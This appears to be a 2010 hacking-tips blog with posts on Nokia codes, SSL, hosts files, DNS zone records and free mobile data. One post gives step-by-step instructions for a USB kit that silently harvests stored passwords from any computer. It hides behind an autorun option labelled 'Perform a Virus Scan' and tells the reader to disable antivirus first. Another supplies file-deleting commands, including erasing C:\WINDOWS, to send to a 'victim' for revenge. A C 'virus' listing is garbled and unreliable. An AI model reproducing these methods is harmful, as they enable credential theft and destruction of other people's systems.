Thursday, August 26, 2010

Now Play Games using a virtual graphics card

Now comes a simple program which allows you to play games without having the hardware.You just need to select the file and the graphics card you require to play the file.You can select amongst these Graphics cards:

    VendorID: 4318
    DeviceID: 592
      • NVIDIA GeforceFX 5900 ultra
        VendorID: 4318
        DeviceID: 816
          • Ati Radeon 8500
            VendorID: 4098
            DeviceID: 20812
              • Ati Radeon 9800 pro
                VendorID: 4098
                DeviceID: 20040                                                                                                                      
                  Here is a link to download the software:

                  SO ENJOY :D :D

                  Wednesday, August 25, 2010

                  Secret Mobile Codes For Nokia

                  These codes will work on most Nokia Mobile Phones to activate/deactivate advanced hidden functions that you can’t change through the phone menu

                  *3370# Activate Enhanced Full Rate Codec (EFR) - Your phone uses the best sound quality but talk time is reduced my approx. 5%

                  #3370# Deactivate Enhanced Full Rate Codec (EFR)

                  *#4720# Activate Half Rate Codec - Your phone uses a lower quality sound but you should gain approx 30% more Talk Time

                  *#4720# Deactivate Half Rate Codec

                  Tuesday, August 24, 2010

                  Hack Saved Passwords using PenDrive

                  As we all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and an USB pendrive you can create your own rootkit to sniff passwords from any computer. We need the following tools to create our rootkit.

                  MessenPass: Recovers the passwords of most popular Instant Messenger programs: MSN Messenger, Windows Messenger, Yahoo Messenger, ICQ Lite 4.x/2003, AOL Instant Messenger provided with Netscape 7, Trillian, Miranda, and GAIM.

                  Mail PassView: Recovers the passwords of the following email programs: Outlook Express, Microsoft Outlook 2000 (POP3 and SMTP Accounts only), Microsoft Outlook 2002/2003 (POP3, IMAP, HTTP and SMTP Accounts), IncrediMail, Eudora, Netscape Mail, Mozilla Thunderbird, Group Mail Free.
                  Mail PassView can also recover the passwords of Web-based email accounts (HotMail, Yahoo!, Gmail), if you use the associated programs of these accounts.

                  IE Passview: IE PassView is a small utility that reveals the passwords stored by Internet Explorer browser. It supports the new Internet Explorer 7.0, as well as older versions of Internet explorer, v4.0 – v6.0

                  Protected Storage PassView: Recovers all passwords stored inside the Protected Storage, including the AutoComplete passwords of Internet Explorer, passwords of Password-protected sites, MSN Explorer Passwords, and more…

                  PasswordFox: PasswordFox is a small password recovery tool that allows you to view the user names and passwords stored by Mozilla Firefox Web browser. By default, PasswordFox displays the passwords stored in your current profile, but you can easily select to watch the passwords of any other Firefox profile. For each password entry, the following information is displayed: Record Index, Web Site, User Name, Password, User Name Field, Password Field, and the Signons filename.
                  Here is a step by step procedre to create the password hacking toolkit.

                  NOTE: You must temporarily disable your antivirus before following these steps.

                  1. Download all the 5 tools, extract them and copy only the executables(.exe files) into your USB Pendrive.
                  ie: Copy the files – mspass.exe, mailpv.exe, iepv.exe, pspv.exe and passwordfox.exe into your USB Drive.

                  2. Create a new Notepad and write the following text into it
                  ACTION= Perform a Virus Scan
                  save the Notepad and rename it from
                  New Text Document.txt to autorun.inf
                  Now copy the autorun.inf file onto your USB pendrive.

                  3. Create another Notepad and write the following text onto it.
                  start mspass.exe /stext mspass.txt start mailpv.exe /stext mailpv.txt
                  start iepv.exe /stext iepv.txt
                  start pspv.exe /stext pspv.txt
                  start passwordfox.exe /stext passwordfox.txt
                  save the Notepad and rename it from
                  New Text Document.txt to launch.bat
                  Copy the launch.bat file also to your USB drive.

                  Now your rootkit is ready and you are all set to sniff the passwords. You can use this pendrive on on any computer to sniff the stored passwords. Just follow these steps

                  1. Insert the pendrive and the autorun window will pop-up. (This is because, we have created an autorun pendrive).

                  2. In the pop-up window, select the first option (Perform a Virus Scan).

                  3. Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files.

                  4. Remove the pendrive and you’ll see the stored passwords in the .TXT files.

                  This hack works on Windows 2000, XP and Vista

                  NOTE: This procedure will only recover the stored passwords (if any) on the Computer.

                  Tuesday, August 17, 2010

                  All About SSL

                  Secure Sockets Layer (SSL) is the most widely used technology for providing a secure communication between the web client and the web server. Most of us are familiar with many sites such as Gmail, Yahoo etc. using https protocol in their login pages. When we see this, we may wonder what’s the difference between http and https. In simple words HTTP protocol is used for standard communication between the Web server and the client. HTTPS is used for a SECURE communication.

                  What exactly is Secure Communication ?

                  Suppose there exists two communication parties A (client) and B (server).
                  Working of HTTP
                  When A sends a message to B, the message is sent as a plain text in an unencrypted manner. This is acceptable in normal situations where the messages exchanged are not confidential. But imagine a situation where A sends a PASSWORD to B. In this case, the password is also sent as a plain text. This has a serious security problem because, if an intruder (hacker) can gain unauthorised access to the ongoing communication between A and B , he can see the PASSWORDS since they remain unencrypted. This scenario is illustrated using the following figure
                  Now lets see the working of HTTPS
                  When A sends a PASSWORD (say “mypass“) to B, the message is sent in an encrypted format. The encrypted message is decrypted on B‘s side. So even if the Hacker gains an unauthorised access to the ongoing communication between A and B he gets only the encrypted password (“xz54p6kd“) and not the original password. This is shown below

                  How is HTTPS implemented ?

                  HTTPS is implemented using Secure Sockets Layer (SSL). A website can implement HTTPS by purchasing an SSL Certificate. Secure Sockets Layer (SSL) technology protects a Web site and makes it easy for the Web site visitors to trust it. It has the following uses
                  1. An SSL Certificate enables encryption of sensitive information during online transactions.
                  2. Each SSL Certificate contains unique, authenticated information about the certificate owner.
                  3. A Certificate Authority verifies the identity of the certificate owner when it is issued.
                  How Encryption Works ?
                  Each SSL Certificate consists of a Public key and a Private key. The public key is used to encrypt the information and the private key is used to decrypt it. When your browser connects to a secure domain, the server sends a Public key to the browser to perform the encryption. The public key is made available to every one but the private key(used for decryption) is kept secret. So during a secure communication, the browser encrypts the message using the public key and sends it to the server. The message is decrypted on the server side using the Private key(Secret key).
                  How to identify a Secure Connection ?
                  In Internet Explorer, you will see a lock icon Picture of the Lock icon in the Security Status bar. The Security Status bar is located on the right side of the Address bar. You can click the lock to view the identity of the website.
                  In high-security browsers, the authenticated organization name is prominently displayed and the address bar turns GREEN when an Extended Validation SSL Certificate is detected. If the information does not match or the certificate has expired, the browser displays an error message or warning and the status bar may turn RED.
                  So the bottom line is, whenever you perform an online transaction such as Credit card payment, Bank login or Email login always ensure that you have a secure communication. A secure communication is a must in these situations. Otherwise there are chances of Phishing using a Fake login Page.
                  Note:posted originally on :

                  Monday, August 16, 2010

                  Block Sites using a C program

                  Most of us are familiar with the virus that used to block Orkut and Youtube site. If you are curious about creating such a virus on your own, here is how it can be done. As usual I’ll use my favorite programming language ‘C’ to create this website blocking virus. I will give a brief introduction about this virus before I jump into the technical jargon.
                  This virus has been exclusively created in ‘C’. So, anyone with a basic knowledge of C will be able to understand the working of the virus. This virus need’s to be clicked only once by the victim. Once it is clicked, it’ll block a list of websites that has been specified in the source code. The victim will never be able to surf those websites unless he re-install’s the operating system. This blocking is not just confined to IE or Firefox. So once blocked, the site will not appear in any of the browser program.
                  NOTE: You can also block a website manually. But, here created virus automates all the steps involved in blocking. The manual blocking process is described in the post How to Block a Website ?
                  Here is the sourcecode of the virus.

                  #include char site_list[6][30]={
                  char ip[12]=”″;
                  FILE *target;
                  int find_root(void);
                  void block_site(void);
                  int find_root()
                  int done;
                  struct ffblk ffblk;//File block structure
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  /*to determine the root drive*/
                  /*to open the file*/
                  return 1;
                  else return 0;
                  void block_site()
                  int i;
                  fseek(target,0,SEEK_END); /*to move to the end of the file*/
                  void main()
                  int success=0;

                  How to Compile ?
                  For step-by-step compilation guide, refer to post How to compile C Programs.
                  1. To test, run the compiled module. It will block the sites that is listed in the source code.
                  2. Once you run the file block_Site.exe, restart your browser program. Then, type the URL of the blocked site and you’ll see the browser showing error “Page cannot displayed“.
                  3. To remove the virus type the following the Run.
                  4. There, open the file named “hosts” using the notepad.At the bottom of the opened file you’ll see something like this
                  5. Delete all such entries which contain the names of blocked sites.

                  courtesy :

                  Sunday, August 8, 2010

                  Creating new domain for personal use

                  Did you know that you can easily create your own domain names for your personal use on your computer? The method we're going to describe could come in handy many ways:

                  • You can map your current home page domain name (at your internet service provider's server) to use your own domain name such as; for fun, or to help you test your HTML pages with your own domain name.
                  • On a local network (or an intranet) you can use your own domain names to access local and remote resources (web servers, etc.)
                  • You can create shorter and easier to remember domain names (or aliases) for already existing domain names.
                  • If your DNS server is slow, you can speedup the access to certain domain names a bit.
                  Here's how to...
                  • Locate or create a file named HOSTS
                    If you're using Windows 95, this file should be in the Windows directory ("C:\WINDOWS" for example).
                    If you're using Windows NT, HOSTS file should be in the "%SystemRoot%\system32\drivers\etc" directory ("C:\WINNT\system32\drivers\etc" for example).
                  • Use your favorite text editor (Notepad for example) to add entries to the HOSTS file. All entries to the HOSTS file should be in the following format:

                    For example, let's say you want to create a domain name [alias] for a known domain name -- "" for example. First, find out the IP address of the "known" (or already existing domain name) by typing the following command at the "DOS or Command Prompt:"


                    or according to our example:

                    Record the IP address for that domain -- for example.

                    Now, decide what your new domain name for should be -- let's say you want to call it "" (something easier to remember).

                    All you have to do to map to is to add the following line to your HOSTS file:


                    Now you can access by using instead -- for example.

                  All about zone records and zone file

                  Zone files organize the zone records for domain names and subdomains in a DNS server. Every domain name and subdomain has a zone file, and each zone file contains zone records. These files, editable in any plain text editor, hold the DNS information linking domain names and subdomains to IP addresses. Zone files usually contain several different zone records.
                  NOTE: Although domain names might have subdomains, the zone files for subdomains are not considered sub-zone. All zone files are separate entities and do not have a hierarchal structure.
                  The most common records contained in a zone file are start of authority (SOA), nameserver, mail exchanger, host, and CNAME. These are described below.
                  • Start of Authority (SOA) — Required for every zone file, the SOA record contains caching information, the zone administrator’s email address, and the master name server for the zone. The SOA also contains a number incremented with each update. As this number updates, it triggers the DNS to reload the zone data.
                  • Name Server (NS) — The NS record contains the name server information for the zone.
                  • Mail Exchanger (MX) — The MX record provides the mail server information for that zone to deliver email to the correct location.
                  • Host (A) — Uses the A record to map an IP address to a host name. This is the most common type of record on the Internet.
                  • Canonical Name (CNAME) — A CNAME is an alias for a host. Using CNAMEs, you can have more than one DNS name for a host. CNAME records point back to the A record. When you change the IP address in your A record, all CNAME records for that domain name automatically follow the new IP address.
                  • Text (TXT) — This is an informational record. Use it for additional information about a host or for technical information to servers.
                  • Service Records (SRV) — SRV records are resource records used to identify computers hosting specific services.
                  • AAAA — AAAA records store a 128-bit Internet Protocol version 6 (IPv6) address that does not fit the standard A record format. For example, 2007:0db6:85a3:0000:0000:6a2e:0371:7234 is a valid 128-bit/IPv6 address.

                  Saturday, August 7, 2010

                  Make Your own virus!!!

                  Yes, Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible.

                  First of all Open your notepad and type the following......... del c:\boot।ini c:\del autoexec.bat Now Save as anyname.exe. Create this in C: drive

                  The only thing you need is Notepad.

                  1. Create a text file called TEST.txt(empty) in C:\
                  2. Now in your notepad type "erase C:\TEST.txt" (without the quotes). Then save it as "Test.cmd".
                  3. Now run the file "Test.cmd"go to C:\ and you'll see your Test.txt is gone.

                  Now, the real work :

                  1. Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
                  2. Now DON'T Run the file or you'll lose your WINDOWS map.
                  So, that's the Virus. In this way you can make a virus to delete any file you want.

                  Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again.
                  Beware : Its simple but a strong virus that can delete anyones Windows OS ...Note : I am not Taking any Responsibilties if by this you damage your windows.



                  Tuesday, August 3, 2010

                  free airtel gprs

                   In this post, i will tell you just a web address . All you need to do is:
                  • Activate Airtel Live on ur CELL phone (No need to pay,its free).
                  • Save the airtel live settings. use it as default settings
                  • Open browser and enter website in place of YYYY in
                  For example: or
                  Note:I do not take responsibility of damage that may cause due to this post or any other present on this blog.